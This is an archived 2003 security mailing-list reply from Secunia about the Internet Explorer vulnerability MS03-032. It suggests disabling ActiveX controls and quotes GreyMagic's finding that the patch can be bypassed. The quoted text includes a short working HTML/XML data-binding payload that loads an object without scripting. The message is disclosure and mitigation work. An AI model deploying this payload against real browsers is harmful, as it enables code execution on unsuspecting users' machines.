| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1063034509.21053.93.camel@LTSP> From: tk at secunia.com (Thomas Kristensen) Subject: Re: [VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032 You may protect yourself by disabling "Run ActiveX controls and plug-ins". We have made a test page based on the information provided by http-equiv and GreyMagic: http://www.secunia.com/MS03-032/ See also SA9580: http://www.secunia.com/advisories/9580/ On Mon, 2003-09-08 at 16:52, GreyMagic Software wrote: > >The patch for Drew's object data=funky.hta doesn't work: > > This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which > explains the problem in detail. Microsoft again patches the object element > in HTML, but it doesn't patch the dynamic version of that same element. > > >1. Disable Active Scripting > > This actually means that no scripting is needed at all in order to exploit > this amazingly critical vulnerability: > > <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> > <xml id="oExec"> > <security> > <exploit> > <![CDATA[ > <object data=x.asp></object> > ]]> > </exploit> > </security> > </xml> > > Ouch. > > > -- Kind regards, Thomas Kristensen CTO Secunia Toldbodgade 37B 1253 Copenhagen K Denmark Tlf.: +45 7020 5144 Fax: +45 7020 5145
Powered by blists - more mailing lists